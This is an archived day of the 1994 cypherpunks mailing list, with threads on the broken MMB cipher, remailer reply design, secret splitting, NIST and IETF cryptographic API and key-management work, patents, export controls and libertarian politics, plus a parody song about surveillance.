Date: Tuesday, December 6, 1994 10:56 am
Subject: WWW> Profile Registry (fwd) (SMTP Id#: 596)

---------- Forwarded message ----------
SENDER: "Geo. A. Jacobs"
Subject: WWW> Profile Registry
Date: 2 Dec 1994 15:46:00 -0800

New on the Internet. A place to post your personal profile.

http://snark.wizard.com/wwpr.html

The one feature that is available on the on-line services, and missing on
the Internet. Register your personal profile with:

World-Wide Profile Registry (WWPR)

Tell the world:
  Where to find you (email address)
  About your personal interests and hobbies
  Where you live (City, State, Country)
  A personal quote or favorite saying
  Alias that you use on irc
  And which channels you hang out in
  Your birthdate
  Occupation / Where you attend school

Search the WWPR database:
  Keyword search to find any of the above that the registrant chooses to
  include in the profile.
_____________________________________________________________________

There is NEVER a charge to search the WWPR database. Profile registration
will be FREE to the first 2000 persons entering their profiles.

Register today, let the world know who you are, what you are.
http://snark.wizard.com/wwpr.html

From jya at pipeline.com Tue Dec 6 08:52:26 1994
From: jya at pipeline.com (John Young)
Date: Tue, 6 Dec 94 08:52:26 PST
Subject: NYT on N2 and Star Wars
Message-ID: <199412061657.LAA11900@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

Two articles today on far-side Witten-Seiberg N2 Supersymmetry and
Republican-hots Star Wars chemical laser weaponry:

"Physicists Say New Math Tool Will Probe Secrets of Matters", by Malcolm W.
Browne. For email copy send blank message with subject: N2_duh

"From Fantasy to Fact: Space-Based Laser Nearly Ready to Fly", by William J.
Broad. For copy, same, with subject: RAY_dem

- ---
[This message has been signed by an auto-signing service. A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

From jcorgan at netcom.com Tue Dec 6 08:53:10 1994
From: jcorgan at netcom.com (Johnathan Corgan)
Date: Tue, 6 Dec 94 08:53:10 PST
Subject: MMB question
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

>What's the current thought on MMB? Has it undergone serious analysis
>and if so, what's the conclusion been?

In the errata to Applied Cryptography, Bruce Schneier makes the following
comment, though nowhere did he elaborate on this:

Pages 266-7: Since the publication of this book, MMB has been
broken. Do not use this algorithm.
=======================================================================
Johnathan Corgan        "Violence is the last refuge of the incompetent"
jcorgan at netcom.com                                     -Isaac Asimov
PGP Public Key: http://www-swiss.ai.mit.edu/~bal/pks-toplev.html
Or send email to: pgp-public-keys at pgp.ai.mit.edu Subj: GET jcorgan
=======================================================================

From frissell at panix.com Tue Dec 6 09:11:21 1994
From: frissell at panix.com (Duncan Frissell)
Date: Tue, 6 Dec 94 09:11:21 PST
Subject: Shrinking government
Message-ID: <199412061707.AA10549@panix.com>

At 03:45 AM 12/6/94 PST, John E. Kreznar wrote:

>Tax revolts do no good. Taxes are the _result_, not the cause.
>
>The cause of big government is popular gratuitous acceptance of
>government favor.
>
>If you want to shrink government, you've got to begin by changing the
>minds of a hundred million of your neighbors who think it's civilized to
>take a government job or contract, accept social security, apply for an
>SBA loan or FEMA assistance, and on down the list.

I prefer to let "reality" change people's minds. The USSR didn't fall
because millions were convinced that Milton Friedman was right and Karl Marx
was wrong. What happened was that the changing circumstances of their lives
made it obvious that the old ways could not be continued.

Technology and "Market Earth"(tm) will convince people that "others
government" is inferior to self government and the modern welfare-warfare
state will fall. In retrospect, it will even look like it was inevitable
(just like the fall of the commies).
Wait 'till the Web + Digital Cash = a market growing so fast that even if
the governments *had* the tools to control it, they couldn't be applied
because it will have grown beyond the control points before the governments
can move.

The Market is The Blob (without Steve McQueen). "X The Unknown."

DCF

"You are a libertarian. You make choices and do what you think best for your
life. Stop trying to prevent other people from behaving in the exact and
natural way you behave."

From rsalz at osf.org Tue Dec 6 09:16:47 1994
From: rsalz at osf.org (Rich Salz)
Date: Tue, 6 Dec 94 09:16:47 PST
Subject: RSAREF and TIPEM
Message-ID: <9412061713.AA03009@sulphur.osf.org>

In places where RSAREF and TIPEM overlap are the API's identical?
Is it possible to build TIPEM on top of RSAREF?
Does anyone have the API's on-line to email me?

Thanks.

From bshantz at spry.com Tue Dec 6 09:33:01 1994
From: bshantz at spry.com (bshantz at spry.com)
Date: Tue, 6 Dec 94 09:33:01 PST
Subject: MMB question
Message-ID: <9412061728.AA04414@homer.spry.com>

jcorgan writes to cypherpunks:

>In the errata to Applied Cryptography, Bruce Schneier makes the following
>comment, though nowhere did he elaborate on this:
>Pages 266-7: Since the publication of this book, MMB has been
>broken. Do not use this algorithm.

How was it broken? Do we have any more details? Is there any more
explanation? I'm just interested in seeing the analysis?

>>>>>>>>>>>>>>>>>>>>>INTERNETWORKING THE DESKTOP<<<<<<<<<<<<<<<<<<<<<<<
Brad Shantz                      bshantz at spry.com
Senior Software Engineer         SPRY Inc.
Direct #: (206)-442-8251         316 Occidental Ave. S.
Main #: (206)-447-0300           2nd Floor
Fax #: (206)-447-9008            Seattle, WA 98104
WWW URL: http://WWW.SPRY.COM
-------------------------------------------------------------
PGP Public Key at: http://www-swiss.ai.mit.edu/~bal/pks-toplev.html
Or email: pgp-public-keys at pgp.ai.mit.edu Subj: GET bshantz
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>><<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

From huntting at glarp.com Tue Dec 6 09:51:59 1994
From: huntting at glarp.com (Brad Huntting)
Date: Tue, 6 Dec 94 09:51:59 PST
Subject: PGP MIME type (was Well now that we're signing...)
In-Reply-To: <199412051953.LAA03423@netcom11.netcom.com>
Message-ID: <199412061750.KAA11728@misc.glarp.com>

> There is of course a draft by Nat Borenstein et al, but it is not an
> official RFC yet.

Ack! I spoke too soon. You're quite right.

brad

From p.v.mcmahon.rea0803 at oasis.icl.co.uk Tue Dec 6 10:04:43 1994
From: p.v.mcmahon.rea0803 at oasis.icl.co.uk (p.v.mcmahon.rea0803 at oasis.icl.co.uk)
Date: Tue, 6 Dec 94 10:04:43 PST
Subject: US Government Cryptographic Interfaces Meeting
Message-ID: <9412061805.AA21938@getafix.oasis.icl.co.uk>

I attach some (unofficial) notes on a recent meeting sponsored by the US
government. Comments welcome.

- pvm

Ps. As I am in San Jose this week, I will try to get to the 10DEC94 Bay Area
CP meeting where I can briefly talk about it if there is any interest.

-----

Report from 01DEC94 NIST Cryptographic API Meeting

On 01DEC94, NIST (a branch of the US Department of Commerce) convened an
"information sharing and discussion" meeting on Cryptographic APIs (CAPI) at
Gaithersburg. Present were "leaders in the field of computer cryptography".

Some well known figures present were Steve Walker, Dorothy Denning, Burt
Kaliski, Warwick Ford, and Miles Smid. Government attendees included 7 from
the NSA, 4 from NIST, 5 from the UK MoD, 2 from NASA, and 2 from ARPA.
In addition to RSA Labs, BNR, and TIS - other vendors present included
Spyrus, IBM, HP, Novell, Microsoft, Datakey, Racal-Guardata, Uptronics,
Bankers Trust, National Semiconductor, and myself representing the X/Open
(vendor consortium) Security Working Group.

The meeting heard presentations on initiatives relating to cryptographic
APIs. These comprised:

- International Cryptographic Experiment (ICE)
- MoD Security in Open Systems Technical Demonstrator Programme
- X/Open Cryptographic Service Model
- ANSI X9F1 Layered Cryptographic Service Model
- POSIX Cryptographic Study Group
- GSS-API
- NIST Cryptographic Service Calls draft FIPS
- NSA CAPI Goals, Architecture, and Requirements
- Royal Holloway University of London CAPI Study
- RSA Labs PKCS11
- IBM Generic Cryptographic Interface
- BNR/NT Entrust Interface
- Spyrus

Copies of the slides, and the X/Open draft preliminary specification were
distributed to the attendees.

I received some unsolicited positive feedback on the X/Open Security Working
Group's output from a number of the attendees, and also three requests to
join the group. It was a useful validation that X/Open are proceeding down
the right track.

There was discussion during the meeting on the correct scope for CAPIs, and
a debate on the market pressures towards convergence. Two specific threads
of activity were identified:

1)standards coordination looks containable given the cooperative and
positive attitude among representatives of ANSI, POSIX, NIST, and X/Open. I
believe that NIST and the vendor community through X/Open can work together
to get agreement on an interface which meets the requirements, is grounded
in implementation experience;

2)implementation experience with CAPIs, and associated effort to shift
export control policy will be enabled as part of the International
Cryptographic Experiment.
Timely completion of a cross-industry cryptographic interface, and in
parallel its validation in real systems, will then lead to a firm basis for
international agreement.

-------------------------------------------------------
P V McMahon 06DEC94
ICL Enterprises
post: Kings House, 33 Kings Road, Reading, RG1 3PX, UK
email: p.v.mcmahon at rea0803.wins.icl.co.uk OR p.mcmahon at xopen.co.uk
phone: +44 734 634882
fax: +44 734 855106
-------------------------------------------------------

From hfinney at shell.portal.com Tue Dec 6 10:13:17 1994
From: hfinney at shell.portal.com (Hal)
Date: Tue, 6 Dec 94 10:13:17 PST
Subject: One-shot remailer replies
In-Reply-To: <01HKB4JDI40290QGGZ@delphi.com>
Message-ID: <199412061812.KAA23245@jobe.shell.portal.com>

Mike Ingle writes:

>True, the path has to be there, or the message can't go. I can't think of a
>fix for that one, can you? Mostly I just don't want an endlessly growing
>amount of information out there. I want old information to die after a
>while, as keys are erased or expired.

No, I can't think of a fix, although your idea at the bottom might be
workable in some form.

>[ DH exchange / Key broadcast approach ]
>Broadcasting a list of keys is one possibility; what if someone else uses
>the same key? Birthday theorem makes this hard to prevent.

You would want some confirmation that you got the key you requested. The
broadcasted key list could be updated to show which ones have been reserved
already, marked with a "nonce" (a one-time use secret random number you sent
with your request) to show who reserved them. In this case you might not
even need to request a specific one, just ask for one to be assigned to you
and then look and see which one you got. Of course this assumes a broadcast
mechanism but perhaps this is tolerable if there aren't too many remailers.

>Pigeonhole holds a one-time reply address. Every week or two it expires and
>you send a new one. If a mail comes in, it uses it, and you send a new one.
You'd have to watch out for attackers who constantly ping the pigeonhole
address and try to see which messages leave the remailer network in a
correlated way.

>Methinks I'd make it a little more robust than the existing systems (easy
>with perl) like being able to grep out a reply header anywhere in the
>message, ignore > indentation, and similar safety precautions.

Yes, that is a good idea. Many of the existing remailers are also written in
perl (calling PGP for decryption) but not much work has been done to improve
them in this way. I think there is recognition that the biggest security
improvement would come with message quantizing (and not passing subject
lines through!) and until we have that the rest is pretty pointless.

>RSAREF is useful for public key and DH. Secret sharing we have to get for
>ourselves. I looked at Shade v1.0, and it seems to be broken on
>little-endian machines. It works on an HP-UX machine, but fails on a
>PC running linux with small-endian enabled in shade.h. The half-hour setup
>delay is not encouraging, either. Your SECSPLIT is nice and simple, but each
>shade is the size of the message. What I need is an error-correcting
>protocol to build a no-growth secret splitter.

I have not looked at the Shade source. Here is the posting I made to
cypherpunks on Krawczyk's method. I wasn't very well organized but if you
read through to the end you may be able to get the gist of it:

> From inbox/cpz Sat Aug 13 19:00:00 1994
> From owner-cypherpunks at toad.com Sat Aug 13 14:10:33 1994
> Date: Sat, 13 Aug 1994 14:06:25 -0700
> From: Hal
> Message-Id: <199408132106.OAA13869 at jobe.shell.portal.com>
> To: cypherpunks at toad.com
> Subject: Secret sharing made short
> Sender: owner-cypherpunks at toad.com
> Precedence: bulk
>
> I came upon a paper with this title in the 1993 Crypto conference proceedings,
> by Hugo Krawczyk.
> He pointed out that with the Shamir-type secret splitting
> which we discuss here periodically you have considerable space expansion.
> Splitting a message of M bits into N shares causes each share to itself be M
> bits. Krawczyk shows a simple system which basically has each share be only
> M/N bits. (I will ignore for simplicity the issue of providing a threshold
> K
> He achieves this by foregoing "pure" information-theoretic secrecy in favor
> of "mere" computational secrecy. This is a reasonable tradeoff since most
> implementations of Shamir sharing end up relying on computational secrecy
> for their random numbers, anyway.
>
> Krawczyk's idea, in the simple subset I am describing, is almost embarrassingly
> easy. Take your message M and encrypt it using a random IDEA or DES key.
> Split the resulting cyphertext into N pieces (just carve it up) and give each
> piece to a shareholder. Take the IDEA/DES key and Shamir-split it into
> N pieces and give those out as well. (Shamir splitting for this case can
> be done simply by having N-1 of the pieces be totally random, and having
> the last piece be the xor of the IDEA/DES key and the N-1 random pieces.
> Only by xor'ing all N pieces can the original key be recovered.)
>
> Everyone ends up with slightly over M/N bits; they have M/N plus the size
> of a DES or IDEA key. But that is pretty close. And unless IDEA or DES can
> be broken they will have to recover all of the shares in order to
> reconstruct the key and read the message.
>
> For generalization to the K IDEA or DES key, but the message itself gets
> split up using an error-correcting code concept so that K pieces are enough
> to reconstruct the message.
> This requires M/K bits per share, plus the overhead for the DES/IDEA key.
>
> This sounds like it would be a good enhancement to the Shamir splitting code
> that was posted here. The IDEA or DES module could be a source of random
> bits for the Shamir splitting.
PGP's IDEA module is pretty self-contained
> and has a random-number entry point.
>
> (Oh, well, I've come this far, I might as well finish it. The message
> distribution scheme Krawczyk gives is this: split the message into K
> pieces. Treat each piece as the coefficient of a K-1 degree polynomial.
> Evaluate the polynomial at X=0,...,N-1 and let the results be the shares.
> Now any K of the shares will allow the polynomial to be reconstructed, and
> by concatenating the coefficients we recover M. This is similar to Shamir's
> scheme but is not informationally secure and has shares of size M/K.)
>
> Hal

>>Considering all the pros and cons, I am afraid that even the security of
>>the one-shot return address is probably insufficient, especially when the
>>simple "post replies to usenet encrypted with this key" is so easy and
>>safe. Granted it will be a problem once everybody starts doing that, but
>>flooding is going to be hard to beat for safety.

>Yes, broadcast is the most secure, but it has a fundamental problem:
>security scales linearly with bandwidth. If you have a pool of 100 users and
>one of them gets a message, your uncertainty is 1 in 100. I've tried without
>success to figure out a broadcast mechanism where security scales faster
>than linearly with bandwidth.

This is true, but you said you are talking about things that can be done today, and today Usenet already has a pool of probably a million users. That is plenty of security. The problem is if everyone starts using it for their replies, but that won't be more than a drop in the bucket for a long time.

>We need a mechanism where there is either a circulating data stream or a
>large file on a server. An incoming message alters the data somehow,
>diffusing the changes over a large area. A request for information selects
>out some transformation of the selected data in such a way that the server
>cannot correlate the incoming message with the outgoing message. I don't see
>any way to do this.

This is an interesting idea. It is sort of like broadcast except you would be reducing the bandwidth requirements by only sending certain information to each user. One way to formalize it would be to say that you have two datasets, D1 and D2. These get combined into D12 = f(D1,D2) for some combining function f. Then we ask whether there is a g(D12) which allows reconstruction of just D1 or D2 in such a way that we can't tell which one it will get just from knowing f and g. Plus, g must output data which is no larger than D1 or D2.

In this strict form I don't think it can be done, because you could change D1 and see if g(D12) changed. If it did, then it was getting D1, and if it didn't, it was getting D2. However if we let g be a little bigger then perhaps it wouldn't be so clear. I don't know...

>Elimination of the replay traffic-analysis problem is major progress. As for
>step-by-step coercion back to the source, I don't see a fix, and we will
>probably have to live with that unless there is a major breakthrough.

Again, users may not be willing to live with it since they have an alternative right now in usenet.

Hal

From cactus at hks.net Tue Dec 6 10:19:08 1994
From: cactus at hks.net (L. Todd Masco)
Date: Tue, 6 Dec 94 10:19:08 PST
Subject: MMB question
Message-ID: <199412061823.NAA12765@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

Johnathan Corgan writes:
> In the errata to Applied Cryptography, Bruce Schneier makes the following
> comment, though nowhere did he elaborate on this:
>
> Pages 266-7: Since the publication of this book, MMB has been
> broken. Do not use this algorithm.

Well, that settles that. Any more details available from anybody?

And: are the errata available on-line anywhere? Sounds like a very worthwhile thing to have.

Thanks,
- --
Todd Masco       | "'When _I_ use a word,' Humpty-Dumpty said, in a rather
cactus at hks.net | scornful tone, 'it means just what I choose it to mean -
cactus at bb.com  | neither more nor less.'" - Lewis Carroll

- ---
[This message has been signed by an auto-signing service. A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLuSsHioZzwIn1bdtAQEHtAF+LyJDBTjMtuwidsQV3DYjqvSkWpeb0jdG
B9GnNuO4dt6jdJLGFOESfybtYD6rM7uZ
=0raj
-----END PGP SIGNATURE-----

From perry at imsi.com Tue Dec 6 10:25:19 1994
From: perry at imsi.com (Perry E. Metzger)
Date: Tue, 6 Dec 94 10:25:19 PST
Subject: IETF proposed standard for mime/PEM integration
Message-ID: <9412061824.AA19008@webster.imsi.com>

The IETF PEM working group has just decided to move the current proposal for a security multiparts extension to MIME forward to draft standard status.

WHAT THIS MEANS FOR CYPHERPUNKS: a standard should soon exist for proper integration of encryption and signature programs and email. This will make for easier interoperation between PGP and mail user agents in the fairly near term.

Details are available in the security multiparts draft, available for ftp from your nearest RFC repository's internet drafts subdirectory.

Perry

From perry at imsi.com Tue Dec 6 10:34:32 1994
From: perry at imsi.com (Perry E. Metzger)
Date: Tue, 6 Dec 94 10:34:32 PST
Subject: Patents to be placed in PD
In-Reply-To: <199412060758.CAA07429@bb.hks.net>
Message-ID: <9412061833.AA07377@snark.imsi.com>

"L. Todd Masco" says:
> This appeared on the IPSEC list (Hooray!).
> jwlowe at IBM followed up by announcing the dedication of IBM's patent
> #5,148,479 to the public.
>
> Is this the apocalypse or something? Never have I seen such signs
> of rationality in companies of this size.

This was caused by tremendous pressure and by Sun being forced into a similar move earlier in the day.

It was the feeling of many members of the IETF working group that the MKMP proposal from IBM could not be considered without the patents being fixed up. Similarly, it was the feeling of the group that SKIP from Sun was unacceptable without the patents being fixed. Sun announced low cost licenses which were still unacceptable. IBM announced free licences. Sun announced that the patents would be assigned to the public domain. IBM announced the same four hours later.

Your faithful IETF correspondent...

.pm

From cactus at hks.net Tue Dec 6 10:54:30 1994
From: cactus at hks.net (L. Todd Masco)
Date: Tue, 6 Dec 94 10:54:30 PST
Subject: Patents to be placed in PD
Message-ID: <199412061858.NAA13101@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

A number of people have asked me what SKIP is.

IBM's patent covered modular key management in a manner that isn't clear to me.

SKIP is Simple Key management for Internet Protocols: it's an elegant key management system that uses Diffie-Hellman public keys (Aziz notes that any DH-like scheme will work). The IPsec folks wanted (or just were considering it?) to use it in their secure IP work, but were balking at the patent status.

Here's how to get the draft (I don't understand it well enough yet to do it justice in a summary) :

- --NextPart

A New Internet-Draft is available from the on-line Internet-Drafts directories. This draft is a work item of the Internet Protocol Security Protocol Working Group of the IETF.

    Title     : Simple Key-Management For Internet Protocols (SKIP)
    Author(s) : A. Aziz
    Filename  : draft-ietf-ipsec-aziz-skip-00.txt
    Pages     : 17
    Date      : 10/26/1994

There are occasions where it is advantageous to put authenticity and privacy features at the network layer. The vast majority of the privacy and authentication protocols in the literature deal with session oriented key-management schemes.
However, many of the commonly used network layer protocols (e.g IP and IPv6) are session-less datagram oriented protocols. We describe a key-management scheme that is particularly well suited for use in conjunction with a session-less datagram protocol like IP or IPv6. We also describe a simple extension of this protocol to provide scalable group key-management for Internet multicasting protocols. SKIP is designed to be plugged into the IP Security Protocol (IPSP) or IPv6. This draft describes how to use SKIP in the context of the IPSP.

Internet-Drafts are available by anonymous FTP. Login with the username "anonymous" and password "guest". After logging in, Type "cd internet-drafts".
    "get draft-ietf-ipsec-aziz-skip-00.txt".

Internet-Drafts directories are located at:

    o US East Coast
      Address: ds.internic.net (198.49.45.10)

    o US West Coast
      Address: ftp.isi.edu (128.9.0.32)

    o Pacific Rim
      Address: munnari.oz.au (128.250.1.21)

    o Europe
      Address: nic.nordu.net (192.36.148.17)

Internet-Drafts are also available by mail.

Send a message to: mailserv at ds.internic.net. In the body type:
    "FILE /internet-drafts/draft-ietf-ipsec-aziz-skip-00.txt".

NOTE: The mail server at ds.internic.net can return the document in MIME-encoded form by using the "mpack" utility. To use this feature, insert the command "ENCODING mime" before the "FILE" command. To decode the response(s), you will need "munpack" or a MIME-compliant mail reader. Different MIME-compliant mail readers exhibit different behavior, especially when dealing with "multipart" MIME messages (i.e., documents which have been split up into multiple messages), so check your local documentation on how to manipulate these messages.

For questions, please mail to Internet-Drafts at cnri.reston.va.us.

Below is the data which will enable a MIME compliant mail reader implementation to automatically retrieve the ASCII version of the Internet-Draft.

- --NextPart
Content-Type: Multipart/Alternative; Boundary="OtherAccess"

- --OtherAccess
Content-Type: Message/External-body;
        access-type="mail-server";
        server="mailserv at ds.internic.net"

Content-Type: text/plain
Content-ID: <19941026102713.I-D at CNRI.Reston.VA.US>

ENCODING mime
FILE /internet-drafts/draft-ietf-ipsec-aziz-skip-00.txt

- --OtherAccess
Content-Type: Message/External-body;
        name="draft-ietf-ipsec-aziz-skip-00.txt";
        site="ds.internic.net";
        access-type="anon-ftp";
        directory="internet-drafts"

Content-Type: text/plain
Content-ID: <19941026102713.I-D at CNRI.Reston.VA.US>

- --OtherAccess--

- --NextPart--

- ---
[This message has been signed by an auto-signing service. A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLuS0XioZzwIn1bdtAQHJzQGA0MVuRr2weN8u058zZD0wzkjTtYadtYiH
Ybgztk2dRevg44wvwYSHOgn6+qFYh7Pa
=M7Om
-----END PGP SIGNATURE-----

From rishab at dxm.ernet.in Tue Dec 6 10:58:51 1994
From: rishab at dxm.ernet.in (rishab at dxm.ernet.in)
Date: Tue, 6 Dec 94 10:58:51 PST
Subject: GATT and ITAR-crypto
Message-ID:

pcw at access.digex.net (Peter Wayner):
> I want to know whether GATT will affect the export of encryption
> software. It seems to frown upon any barrier to trade and I think
> I could argue, perhaps not correctly, that if ACME in Taiwan
> can't buy the necessary encryption software to do business with
> CENTRAL in Kansas, then ACME is prevented from competing in America.
> BONEHEAD Inc, from North Dakota won't have to worry about foreign
> competition.

Heh heh. Missiles R Us in Iran can't buy target analysis software so can't compete in the US cruise missile market; GD needn't bother about cheaper Iranian labour costs.

As you correctly noted later, exceptions are made for missiles (and French movies, and US _peanuts_) - IAC US policy is to treat crypto as munitions, or at best 'dual-use' tech. GATT does not affect other arms treaties - NPT, MTCR, etc...

"We know everything about you that we need to know" - Coleta Brueck, IRS
-----------------------------------------------------------------------------
Rishab Aiyer Ghosh                     "In between the breaths is
rishab at dxm.ernet.in                  the space where we live"
rishab at arbornet.org                           - Lawrence Durrell
Voice/Fax/Data +91 11 6853410  Voicemail +91 11 3760335
H 34C Saket, New Delhi 110017, INDIA

From perry at imsi.com Tue Dec 6 11:08:10 1994
From: perry at imsi.com (Perry E. Metzger)
Date: Tue, 6 Dec 94 11:08:10 PST
Subject: Patents to be placed in PD
In-Reply-To: <199412061858.NAA13101@bb.hks.net>
Message-ID: <9412061906.AA07443@snark.imsi.com>

"L. Todd Masco" says:
> IBM's patent covered modular key management in a manner that isn't
> clear to me.

Not just you; the opinion of some of the IBMers there was that they didn't think it covered their proposal, either.

> SKIP is Simple Key management for Internet Protocols: it's an elegant
> key management system that uses Diffie-Hellman public keys (Aziz notes
> that any DH-like scheme will work). The IPsec folks wanted (or just
> were considering it?) to use it in their secure IP work, but were balking
> at the patent status.

Just considering it. In my opinion, none of the existing key management proposals is sufficient. They all have the feature that very good cryptographers have sweated over the cryptography in them but that the systems don't attach enough information to the resultant security associations to permit you to actually write secure applications, which in the end makes the exercise less than completely successful.

.pm

From norm at netcom.com Tue Dec 6 11:40:52 1994
From: norm at netcom.com (Norman Hardy)
Date: Tue, 6 Dec 94 11:40:52 PST
Subject: MacPGP
Message-ID:

Does anyone know of a manual for the Mac PGP 2.6? I can find the functions that I need in the command line interface manual but then it is unclear how to get exactly that function thru menu selections. The command R function reads commands from a file. It is awkward and keeps warning you that it is buggy.

I can imagine writing such a manual but before I know the answers it would be inaccurate and after I know the answers it would seem superfluous.

From jamiel at sybase.com Tue Dec 6 12:19:30 1994
From: jamiel at sybase.com (Jamie Lawrence)
Date: Tue, 6 Dec 94 12:19:30 PST
Subject: Ride to CP meeting request
Message-ID:

If anyone is headed to this month's meeting from San Francisco and has a seat they'd like to let me occupy, please email me.

-carless in SF

From perry at sutr.cynic.org Tue Dec 6 12:38:00 1994
From: perry at sutr.cynic.org (Perry The Cynic)
Date: Tue, 6 Dec 94 12:38:00 PST
Subject: Shrinking government
In-Reply-To: <9412061145.AA15280@ininx>
Message-ID:

jkreznar at ininx.com (John E. Kreznar) writes:
> Tax revolts do no good. Taxes are the _result_, not the cause.

Perhaps. But anger over taxation can be a powerful galvanizing force that gets disinterested, apolitical, apathetic people to stand up and vote. It may not be your philosophical piece of cake, but it works. Besides, getting angry at the result of a policy is a good first step to questioning the policy itself. "If you don't like high taxes, think of where all that money is going."

> The cause of big government is popular gratuitous acceptance of
> government favor.

It's hardly gratuitous. The general public feeling nowadays, that their money is being taken whether they consent or not. Given that (nonconsensual takings backed by prevailing law), it is perfectly rational to "get yours", i.e.
milk the resulting machine for whatever you can do (including, i might note, disregarding prevailing IRS codes). It's not a "government favor", it's called "getting back your money."

> If you want to shrink government, you've got to begin by changing the
> minds of a hundred million of your neighbors who think it's civilized to
> take a government job or contract, accept social security, apply for an
> SBA loan or FEMA assistance, and on down the list.

Not necessarily. It is quite enough to convince many of your neighbors that they (a) are not getting their tax money's worth back from the government(s), and that (b) there's a better way. Right now, it seems that (a) is gathering steam. The problem is expressing (b) - which many of us are convinced of - in terms Mr./Ms. Average Voter can agree with... and "taking money from government is uncivilized" does not strike me as very effective.

  -- perry
---------------------------------------------------------------------------
Perry The Cynic                                        perry at cynic.org
To a blind optimist, an optimistic realist must seem like an Accursed Cynic.
---------------------------------------------------------------------------

From cactus at hks.net Tue Dec 6 13:15:01 1994
From: cactus at hks.net (L. Todd Masco)
Date: Tue, 6 Dec 94 13:15:01 PST
Subject: GUCAPI (Grand Unified Crypto API)
Message-ID: <199412062119.QAA14522@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

I've been thinking a lot recently about how to implement a generic API for crypto such that the interface could be independent of the cipher used.

What I'm thinking of is something like:

    guc_init_crypto();
    guc_encrypt();
    guc_decrypt();
    guc_assemble();
    guc_key_get();
    guc_key_put();
    guc_key_gen();

So, to encrypt a PGP-style message, you'd:

    guc_init_crypto("PGP_26", &context, &keys, &message );

Which would initialize whatever random vectors you're likely to need for a PGP session and allocate the appropriate space to the pointers.
The types should be totally opaque, implemented in the library.

    guc_key_gen("PGP_26", &keys);

Which would generate a session key for IDEA and grow the keys structure appropriately;

    guc_get_key("PGP_26", &keys, originator);
    guc_get_key("PGP_26", &keys, recipient1);
    guc_get_key("PGP_26", &keys, recipient2);
    ...

Which would grow the keys structure and add in appropriate RSA keys. (Alternatively, it could be done as one vector with all the recipients lists).

    guc_encrypt("PGP_26", &keys, &input, &message);

Which would encrypt the IDEA session key with the appropriate RSA key and the input with the IDEA session key. And,

    guc_seal("PGP_26", &message, &output);

Which would put the messages into the appropriate (Radix-64?) format and put it out to the output, (the output structure would specify whether memory is to be allocated and filled, files written to, whatever).

My goal is to come up with an API that could be integrated once into an application and would be flexible enough that new crypto methods, whether ciphers or key management, could be supported entirely by upgrading the library. This includes being flexible enough to cover as diverse methods as OTPs (where the init function would open a file or other pad as its "random vector," key retrieval would be a noop, and encode would just XOR) and PEM (key management would be done on the basis of the method specified. I'm fuzzy on how to generalize key management into a model that would include both web-of-trust and PEM-style certificates, so conversation on this would be greatly appreciated).

It seems to me that the benefits are pretty clear: Set up such an API as a spec that can be implemented both inside and outside of the US and it allows everybody to implement to one API. There's no good reason to have a bazillion different crypto APIs if a generalized one can be achieved.

I've posted about this before and received no response: since I'd like to solidify the API soon so I can firm up the coding I'm doing, I ask that folks take the time to comment. The code I end up producing will be publicly available, possibly as a "non-commercial use" copyright, perhaps PD.

Thoughts?
- --
Todd Masco       | "'When _I_ use a word,' Humpty-Dumpty said, in a rather
cactus at hks.net | scornful tone, 'it means just what I choose it to mean -
cactus at bb.com  | neither more nor less.'" - Lewis Carroll

- ---
[This message has been signed by an auto-signing service. A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLuTVNCoZzwIn1bdtAQFK1AGA16g1wgKMc4qg3SVxDMW3y+1IGeWDbVvj
Q6uqlRmyaFNm1NjNfV0gCxZgAZ9oM338
=br4C
-----END PGP SIGNATURE-----

From gnu Tue Dec 6 13:30:08 1994
From: gnu (gnu)
Date: Tue, 6 Dec 94 13:30:08 PST
Subject: Ho, Ho, Ho
Message-ID: <9412062130.AA16454@toad.com>

Forwarded-by: Mike Godwin
From: "Eugene Volokh"

You'd better watch out,
You'd better not cry,
You'd better not pout;
I'm telling you why.
Santa Claus is tapping
Your phone.

He's bugging your room,
He's reading your mail,
He's keeping a file
And running a tail.
Santa Claus is tapping
Your phone.

He hears you in the bedroom,
Surveills you out of doors,
And if that doesn't get the goods,
Then he'll use provocateurs.

So--you mustn't assume
That you are secure.
On Christmas Eve
He'll kick in your door.
Santa Claus is tapping
Your phone.

[Supposedly written for and sung at a US Department of Justice, Office of Legal Counsel Christmas party during the Carter administration.]

-- Eugene Volokh, UCLA Law

From bshantz at spry.com Tue Dec 6 13:47:26 1994
From: bshantz at spry.com (bshantz at spry.com)
Date: Tue, 6 Dec 94 13:47:26 PST
Subject: GUCAPI (Grand Unified Crypto API)
Message-ID: <9412062142.AA08621@homer.spry.com>

L.Todd Masco writes:

>I've been thinking a lot recently about how to implement a generic API for
>crypto such that the interface could be independent of the cipher used.

So, you just want a generic overlay (wrapper) to any of the existing encryption algorithms? Is this correct?

>My goal is to come up with an API that could be integrated once into an
>application and would be flexible enough that new crypto methods, whether
>ciphers or key management, could be supported entirely by upgrading the
>library. This includes being flexible enough to cover as diverse
>methods as OTPs ...

Well, it sounds good in theory. However, trust me, Todd, writing a generic API that is multi-platform is not necessarily as easy as it sounds. There's a lot of code in this project. You would also have to make sure that the API is generic so it could work in ANY program that might use encryption or digital signatures. (i.e. e-mail, USENET news, possibly even lending itself to a Secure HTTP implementation.)

>(key management would be done on the basis of the method specified.)

Uh, just from a first glance, I'd say that this is going to slip gently into the ITAR pits. There are very few "methods" other than RSAREF that you could use to make this "universal". Also, would this act as a wrapper over PGP, or would it use the same concepts (and or code) to do the same things?

>It seems to me that the benefits are pretty clear: Set up such an API
>as a spec that can be implemented both inside and outside of the US and
>it allows everybody to implement to one API. There's no good reason to
>have a bazillion different crypto APIs if a generalized one can be
>achieved.

Agreed, it would be nice to have one API.
